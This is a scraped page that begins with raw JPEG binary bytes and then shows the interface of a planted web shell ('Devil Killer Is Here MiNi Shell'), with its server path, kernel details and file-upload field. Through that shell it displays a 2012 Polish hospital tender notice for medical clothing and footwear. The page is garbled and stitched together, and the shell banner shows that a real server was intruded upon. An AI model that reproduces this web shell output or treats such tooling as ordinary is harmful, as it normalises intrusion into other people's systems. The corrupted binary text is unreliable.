JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120612/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120612/128637-N-2012.html

<p class="kh_header"><b>Wrocław: dostawa odzieży medycznej, chirurgicznej operacyjnej zabiegowej, roboczej (ochronnej), obuwia medycznego, roboczego (ochronnego) oraz umundurowania i obuwia służbowego portierów na 2012/2013 rok.</b><br>
<b>Numer ogłoszenia: 128637 - 2012; data zamieszczenia: 12.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 4 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Weigla 5, 50-981 Wrocław, woj. dolnośląskie, tel. 071 7660119, faks 071 7660630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.4wsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa odzieży medycznej, chirurgicznej operacyjnej zabiegowej, roboczej (ochronnej), obuwia medycznego, roboczego (ochronnego) oraz umundurowania i obuwia służbowego portierów na 2012/2013 rok..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa odzieży medycznej, chirurgicznej operacyjnej zabiegowej, roboczej (ochronnej), obuwia medycznego, roboczego (ochronnego) oraz umundurowania i obuwia służbowego portierów na 2012/2013 rok wg. pakietów 1-6.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 18.20.00.00-1, 18.81.33.00-4, 18.81.23.00-7, 18.44.30.00-6, 18.23.54.00-9, 18.33.20.00-5, 18.81.23.00-7, 18.81.20.00-4, 39.51.41.00-9, 18.11.00.00-3, 18.83.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WARUNKI WPŁATY  I ZWROTU WADIUM.

1.	Obowiązek wpłaty wadium

Oferta musi być zabezpieczona wadium. Zamawiający zatrzyma wadium, jeżeli wystąpią przesłanki wymienione w art.46 ust. 4a i 5 PZP.
Wadium musi obejmować cały okres związania ofertą.
Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium, zostanie przez Zamawiającego wykluczony z postępowania.
 
Przystępując do przetargu na całość przedmiotu zamówienia wykonawca jest zobowiązany wnieść wadium w wysokości: 4 100,00 zł (słownie: cztery tysiące sto złotych, 00/100) - dotyczy całości przedmiotu zamówienia; na poszczególne części w wysokości:

Pakiet 1	1 800,00 zł
Pakiet 2	700,00 zł
Pakiet 3	100,00 zł
Pakiet 4	650,00 zł
Pakiet 5	550,00zł
Pakiet 6	300,00zł

Wykonawcy składający ofertą na więcej niż jeden pakiet muszą zsumować wartości z pakietów, w których chcą uczestniczyć, np. Pakiet 1 i 2 powinien wnieść wadium w wysokości: 2 500,00 zł (1 800,00 zł + 700,00 zł) - dotyczy formy przelewu na rachunek Zamawiającego.

Termin wniesienia wadium upływa w dniu składania ofert tj. dnia 20.06.2012r. godz. 1000



2.	Forma wpłaty wadium.
2.1	Wadium może być wnoszone w następujących formach:
a)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym (w przypadku złożenia oferty na więcej niż jeden pakiet, Wykonawca zobowiązany jest złożyć poręczenie na każdy pakiet oddzielnie),
b)	gwarancjach bankowych (w przypadku złożenia oferty na więcej niż jeden pakiet, Wykonawca zobowiązany jest złożyć gwarancję na każdy pakiet oddzielnie),
c)	gwarancjach ubezpieczeniowych (w przypadku złożenia oferty na więcej niż jeden pakiet, Wykonawca zobowiązany jest złożyć gwarancję na każdy pakiet oddzielnie)
d)	lub poręczeniach określonych w art. 45 ust. 6 ustawy PZP (w przypadku złożenia oferty na więcej niż jeden pakiet, Wykonawca zobowiązany jest złożyć poręczenie na każdy pakiet oddzielnie),
e)	przelewem na rachunek Zamawiającego - środki finansowe powinny wpłynąć na konto Zamawiającego do 20.06.2012r. do godz. 1000 pod rygorem wykluczenia z postępowania.


Bank Gospodarstwa Krajowego O/Wrocław
07 1130 1033 0018 7991 8520 0007
z zaznaczeniem:
Wadium w przetargu, na dostawę odzieży medycznej, roboczej (ochronnej), obuwia medycznego , roboczego (ochronnego)oraz umundurowania i obuwia służbowego portierów na 2012/2013 rok, znak sprawy 56/Log./2012

	
2.2  Do oferty należy dołączyć oryginał dowodu wpłaty wadium (przelew) lub wygenerowane elektroniczne potwierdzenie wykonania przelewu (dokument sporządzony na podstawie art.7 Ustawy Prawo Bankowe (Dz. U. nr 72 z 2002 roku, poz. 665 z późn. zm.) - nie wymagający podpisu ani stempla).
2.3 W przypadku wnoszenia wadium przez Wykonawcę w innych formach, oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć do depozytu u Głównego Księgowego Szpitala (KASA SZPITALNA - Budynek Administracji Ogólnej) a kserokopię potwierdzoną za zgodność z oryginałem dołączyć do oferty. 

UWAGA!
W przypadku złożenia oferty na więcej niż jeden pakiet w formie gwarancji ubezpieczeniowej lub bankowej, Wykonawca zobowiązany jest złożyć gwarancję na każdy pakiet oddzielnie)
Złożenie dokumentu wadialnego w innym miejscu i błędnej formie może spowodować zastosowanie sankcji wynikającej z art. 24 ust. 2 pkt. 2 ustawy PZP.
2.4	Zwrot wadium lub ewentualne ponowne jego wniesienie regulują przepisy art. 46 i art. 184 PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">DOKUMENTÓW  PRZEDMIOTOWYCH:
Wykonawca zobowiązany jest załączyć do oferty następujące dokumenty i oświadczenia:
1. Pakiet 1 - Dostawa odzieży dla personelu medycznego: 
a)	Certyfikat zgodności z Polską Normą PN-P - 84525:1998 zgodnie z dyrektywą 89/686/EWG (Odzież medyczna - kategoria I) wystawiony przez np.: Polskie Centrum Badań i Certyfikacji (PCB i C).
b)	Certfikat zgodności z Polską Normą - PN-EN 340:2006 na zastosowaną w odzieży tkaninę 
c)	Certyfikat zgodności z Polską Normą PN-P 84525:1998 na zastosowane w odzieży guziki.
d)	Certyfikat OekoTex Standard 100 na zastosowaną w odzieży tkaninę wystawiony przez producenta tkaniny - świadczący o przyjazności tkaniny dla skóry oraz że nie zawiera szkodliwych substancji chemicznych m.in. pestycydów, chloro-fenoli, formaldehydu, barwników alergizujących, zabronionych barwników azotowych i ekstrahowanych metali ciężkich, wydany przez niezależne laboratorium.
e)	Karta techniczna tkanin użytych do produkcji odzieży wystawiona przez producenta tkanin z opisem do uszycia, której odzieży tkanina będzie przeznaczona w celu potwierdzenia parametrów tkanin (skład i gramatura tkaniny) określonych w SIWZ 
f)	Do oferty prosimy dołączyć dokładny opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego (w formie prospektów, katalogów odzieży w języku polskim) określający: sposób zapinania bluz, rozmieszczenia i ilości kieszeni, sposób wykończenia przy szyi (z kołnierzykiem lub bez kołnierzyka), wykończenia lamówkami kieszonek i rękawów oraz zalecaną technologię prania z uwzględnieniem wymagań określonych przez Zamawiającego. Odzież ma być przedstawiona wyraźnie w katalogu lub zdjęciu, w kolorze, dającym możliwość porównania i sprawdzenia opisu odzieży z SIWZ. Nie dopuszcza się rysunków technicznych odzieży. W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy w Załączniku nr 2 do SIWZ podać numer strony materiałów informacyjnych, na której wymagane parametry są potwierdzone oraz zaznaczyć ( np zakreślaczem) w katalogach, proponowane wzory odzieży minimum po dwa dla każdej pozycji pakietu.
g)	Oświadczenie Wykonawcy (wg. wzoru stanowiącego załącznik nr 5 do SIWZ), że zaoferowane w ofercie wyroby będą spełniały wymagania w zakresie wymogów użytkowych odzieży opisanych w SIWZ.
h)	Tabele rozmiarowe stosowane w firmie Wykonawcy zgodnie z PN-EN 13402-3;2004
2. Pakiet 2 - Dostawa odzieży chirurgicznej operacyjnej barierowej i zabiegowej bawełnianej:
Pozycja 1:
a)	Karta techniczna tkaniny z której zostaną wykonane fartuchy chirurgiczne o parametrach określonych w normie PN-EN 13795, w celu potwierdzenia parametrów tkanin (skład tkaniny) określonych w SIWZ, 
b)	Oświadczenie Wykonacwy, że zaoferowane w ofercie wyroby będą spełniały wymagania normy PN-EN 13795 w zakresie spełniania wymogów użytkowych dla fartuchów chirurgicznych, wszystkich kryteriów dla powierzchni krytycznej i mniej krytycznej wyrobu - wymagania użytkowe fartuchów chirurgicznych dla zabiegów standardowego ryzyka (wg. wzoru stanowiącego załącznik nr 6 do SIWZ)
c)	W przypadku wyrobów medycznych, zgodnie z ustawą z dnia 20.05.2010r. o wyrobach medycznych (Dz. U. Nr 107, poz. 679), Zamawiający żąda oświadczenia Wykonawcy (wg. wzoru stanowiącego załącznik nr 7 do SIWZ), że będzie posiadał aktualne i ważne przez cały okres trwania umowy dopuszczenia do obrotu na każdy oferowany produkt (w postaci Deklaracji Zgodności wydanej przez producenta oraz Certyfikatu CE wydanego przez jednostkę notyfikacyjną (jeżeli dotyczy), Formularza Powidaomienia / Zgłoszenia do Rejestru Wyrobów Medycznych).
Na żądanie Zamawiającego, Wykonawca przed zawarciem umowy oraz w trakcie realizacji umowy ma obowiązek udostępnić do każdego oferowanego produktu: 
	Deklarację Zgodności wydaną przez producenta
	Certfikat CE (jeżeli dotyczy) wydany przez jednostkę notyfikacyjną
	Formularz Powiadomienia / Zgłoszenia do Rejestru Wyrobów Medycznych ze szczegółowym opisem:
-Wykonawca zobowiązany jest, aby złożony dokument potwierdzony był przez Urząd Rejestracji Produktów Leczniczych Wyrobów Medycznych i Produktów Biobójczych na złożonym do urzędu formularzu
Lub
-Wykonawca złoży odrębne pismo potwierdzające złożenie wniosku poświadczone przez Urząd Rejestracji Produktów Leczniczych Wyrobów Medycznych i Produktów Biobójczych
w terminie 3 dni od dnia otrzymania pisemnego wezwania, pod rygorem odstąpienia od umowy.
d)	Zamawiający zastrzega sobie prawo do zażądania w trakcie realizacji umowy przedstawienia dokumentów potwierdzających wykonanie badań fartuchów na odporność na przenikanie cieczy metodami zawartymi w normie PN-EN 13795-2 potwierdzające spełnienie wymagań użytkowych standardowych i poziomu ochrony zawartego w normie PN-EN 13795-3 pod rygorem odstąpienia od umowy.
e)	Do oferty prosimy dołączyć dokładny opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego (w formie prospektów, katalogów odzieży w języku polskim) określający: 
kolorystyczny system określania rozmiaru, rodzaj zapięcia/wiązania, system zaznaczania kolejnych użyć, sposób uszycia ściągaczy, mankietów, dekoltów oraz zalecaną technologię prania, suszenia i sterylizacji z uwzględnieniem wymagań określonych przez Zamawiającego. Odzież ma być przedstawiona wyraźnie w katalogu lub zdjęciu, w kolorze, dającym możliwość porównania i sprawdzenia opisu odzieży z SIWZ. Nie dopuszcza się rysunków technicznych odzieży. W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy w Załączniku nr 2 do SIWZ podać numer strony materiałów informacyjnych, na której wymagane parametry są potwierdzone oraz zaznaczyć ( np zakreślaczem) w materiałach informacyjnych, gdzie znajduje się potwierdzenie wymaganego parametru.
Pozycja 2-4:
a)	Karta techniczna tkaniny z której zostaną wykonane fartuchy i ubrania z parametrami określonymi w normie PN-EN 13795, w celu potwierdzenia parametrów tkanin (skład tkaniny) określonych w SIWZ, 
b)	Oświadczenie Wykonawcy, że zaoferowane w ofercie wyroby będą spełniały wymagania normy PN-EN 13795 w zakresie spełniania wymogów użytkowych odzieży dla bloków operacyjnych (wg. wzoru stanowiącego załącznik nr 7 do SIWZ),
c)	W przypadku wyrobów medycznych, zgodnie z ustawą z dnia 20.05.2010r. o wyrobach medycznych (Dz. U. Nr 107, poz. 679), Zamawiający żąda oświadczenia Wykonawcy (wg. wzoru stanowiącego załącznik nr 7 do SIWZ), że będzie posiadał aktualne i ważne przez cały okres trwania umowy dopuszczenia do obrotu na każdy oferowany produkt (w postaci Deklaracji Zgodności wydanej przez producenta oraz Certyfikatu CE wydanego przez jednostkę notyfikacyjną (jeżeli dotyczy), Formularza Powidaomienia / Zgłoszenia do Rejestru Wyrobów Medycznych).
Na żądanie Zamawiającego, Wykonawca przed zawarciem umowy oraz w trakcie realizacji umowy ma obowiązek udostępnić do każdego oferowanego produktu: 
	Deklarację Zgodności wydaną przez producenta
	Certfikat CE (jeżeli dotyczy) wydany przez jednostkę notyfikacyjną
	Formularz Powiadomienia / Zgłoszenia do Rejestru Wyrobów Medycznych ze szczegółowym opisem:
-Wykonawca zobowiązany jest, aby złożony dokument potwierdzony był przez Urząd Rejestracji Produktów Leczniczych Wyrobów Medycznych i Produktów Biobójczych na złożonym do urzędu formularzu
Lub
-Wykonawca złoży odrębne pismo potwierdzające złożenie wniosku poświadczone przez Urząd Rejestracji Produktów Leczniczych Wyrobów Medycznych i Produktów Biobójczych
w terminie 3 dni od dnia otrzymania pisemnego wezwania, pod rygorem odstąpienia od umowy.
d)	Zamawiający zastrzega sobie prawo do zażądania w trakcie realizacji umowy przedstawienia dokumentów potwierdzających wykonanie badań pylenia odzieży metodami zawartymi w normie PN-EN 13795-2 potwierdzająych spełnienie wymagań użytkowych i poziomu ochrony zawartego w normie PN-EN 13795-3 pod rygorem odstąpienia od umowy.
e)	Do oferty prosimy dołączyć dokładny opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego (w formie prospektów, katalogów odzieży w języku polskim) określający sposób uszycia kieszeni i dekoltów bluz i sukienek oraz zalecaną technologię prania, suszenia i sterylizacji z uwzględnieniem wymagań określonych przez Zamawiającego. Odzież ma być przedstawiona wyraźnie w katalogu lub zdjęciu, w kolorze, dającym możliwość porównania i sprawdzenia opisu odzieży z SIWZ. Nie dopuszcza się rysunków technicznych odzieży. W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy w Załączniku nr 2 do SIWZ podać numer strony materiałów informacyjnych, na której wymagane parametry są potwierdzone oraz zaznaczyć ( np zakreślaczem) w materiałach informacyjnych, gdzie znajduje się potwierdzenie wymaganego parametru.
Pozycja 5-6:
a)	Karta techniczna tkaniny z której będzie uszyta odzież w celu potwierdzenia parametrów tkanin (skład i gramatura tkaniny) określonych w SIWZ, 
b)	Badania laboratoryjne tkaniny określające wartość parametru pylenia, który nie może być wyższy niż 4,5 log 10 (liczba cząstek)
c)	Oświadczenie Wykonawcy, że zaoferowane w ofercie wyroby będą spełniały wymagania w zakresie wymogów użytkowych odzieży opisanych w SIWZ  (wg. wzoru stanowiącego załącznik nr 8 do SIWZ),
d)	W przypadku wyrobów medycznych, zgodnie z ustawą z dnia 20.05.2010r. o wyrobach medycznych (Dz. U. Nr 107, poz. 679), Zamawiający żąda oświadczenia Wykonawcy (wg. wzoru stanowiącego załącznik nr 7 do SIWZ), że będzie posiadał aktualne i ważne przez cały okres trwania umowy dopuszczenia do obrotu na każdy oferowany produkt (w postaci Deklaracji Zgodności wydanej przez producenta oraz Certyfikatu CE wydanego przez jednostkę notyfikacyjną (jeżeli dotyczy), Formularza Powidaomienia / Zgłoszenia do Rejestru Wyrobów Medycznych).
Na żądanie Zamawiającego, Wykonawca przed zawarciem umowy oraz w trakcie realizacji umowy ma obowiązek udostępnić do każdego oferowanego produktu: 
	Deklarację Zgodności wydaną przez producenta
	Certfikat CE (jeżeli dotyczy) wydany przez jednostkę notyfikacyjną
	Formularz Powiadomienia / Zgłoszenia do Rejestru Wyrobów Medycznych ze szczegółowym opisem:
-Wykonawca zobowiązany jest, aby złożony dokument potwierdzony był przez Urząd Rejestracji Produktów Leczniczych Wyrobów Medycznych i Produktów Biobójczych na złożonym do urzędu formularzu
Lub
-Wykonawca złoży odrębne pismo potwierdzające złożenie wniosku poświadczone przez Urząd Rejestracji Produktów Leczniczych Wyrobów Medycznych i Produktów Biobójczych
w terminie 3 dni od dnia otrzymania pisemnego wezwania, pod rygorem odstąpienia od umowy.
e)	Do oferty prosimy dołączyć dokładny opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego (w formie prospektów, katalogów odzieży w języku polskim) określający sposób uszycia kieszeni, dekoltów oraz technologię prania, suszenia i sterylizacji z uwzględnieniem wymagań określonych przez Zamawiającego. Odzież ma być przedstawiona wyraźnie w katalogu lub zdjęciu, w kolorze, dającym możliwość porównania i sprawdzenia opisu odzieży z SIWZ. Nie dopuszcza się rysunków technicznych odzieży. W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy w Załączniku nr 2 do SIWZ podać numer strony materiałów informacyjnych, na której wymagane parametry są potwierdzone oraz zaznaczyć ( np zakreślaczem) w materiałach informacyjnych, gdzie znajduje się potwierdzenie wymaganego parametru.
Pakiet 3 - Dostawa odzieży i obuwia dla personelu pojazdów sanitarnych R i W: 
a)	Karta techniczna tkaniny z której będzie uszyta odzież w celu potwierdzenia parametrów tkanin  (skład i gramatura tkaniny) określonych w SIWZ
b)	Oświadczenie Wykonawcy (wg. wzoru stanowiącego załącznik nr 9 do SIWZ), że zaoferowane w ofercie wyroby będą posiadały certyfikat uprawniający do ozaczenia znakiem bezpieczeństwa CE oraz że wykonane są zgodnie z warunkami technologicznymi określonymi w Polskich i Europejskich normach.
c)	Do oferty prosimy dołączyć dokładny opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego (w formie prospektów, katalogów obuwia i odzieży w języku polskim) oraz określający technologię prania z uwzględnieniem wymagań określonych przez Zamawiającego. W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy w Załączniku nr 2 do SIWZ podać numer strony materiałów informacyjnych, na której przedstawione są odpowiednie wzory oraz zaznaczyć je ( np zakreślaczem) w katalogach gdzie znajduje się potwierdzenie wymaganego parametru.
4. Pakiet 4 - Dostawa obuwia dla personelu medycznego:
a)	Certyfikat zgodności z Polską Normą PN-EN 347 zgodnie z dyrektywą 89/686/EWG (Obuwie medyczne - kategoria I) wystawiony przez np.: Polskie Centrum Badań i Certyfikacji (PCB i C).
b)	Do oferty prosimy dołączyć dokładny opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego (w formie prospektów, katalogów w języku polskim)  określający zgodność wizualną oferowanego obuwia z opisem zawartym w SIWZ w zakresie cech widocznych, rodzaj cholewki, rodzaj podeszwy, sposób łączenia cholewki z podeszwą itp. W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy w Załączniku nr 2 do SIWZ podać numer strony materiałów informacyjnych, na której wymagane parametry są potwierdzone oraz zaznaczyć ( np. zakreślaczem) w katalogach, proponowane wzory obuwia minimum po dwa dla pozycji 2 i 3 pakietu.
5. Pakiet 5 - Dostawa odzieży i obuwia roboczego (ochronnego):
a)	Oświadczenie Wykonawcy, że zaoferowane w ofercie wyroby będą spełniały wymagania w zakresie wymogów użytkowych odzieży opisanych w SIWZ  oraz są zgodne z normami PN-EN:
	Poz. 13 - EN166;
	Poz. 18 - EN 340;
	Poz. 25 - EN 166;
	Poz. 27 - EN388;
	Poz. 33 - EN407;
	Poz. 34 - EN374, EN420, EN388;
	Poz. 35 - EN388;
	Poz. 37 - EN12477-A, EN407, EN388;
	Poz. 38 - EN166;
	Poz. 39 - EN166, EN175;
	Poz. 40 - EN 361, EN358, EN813;
 (wg. wzoru stanowiącego załącznik nr 10 do SIWZ)
b)	Zalecana technologia prania, czyszczenia i konserwacji dla oferowanych wyrobów - należy dostarczyć na żądanie Zamawiającego w trakcie realizacji umowy.
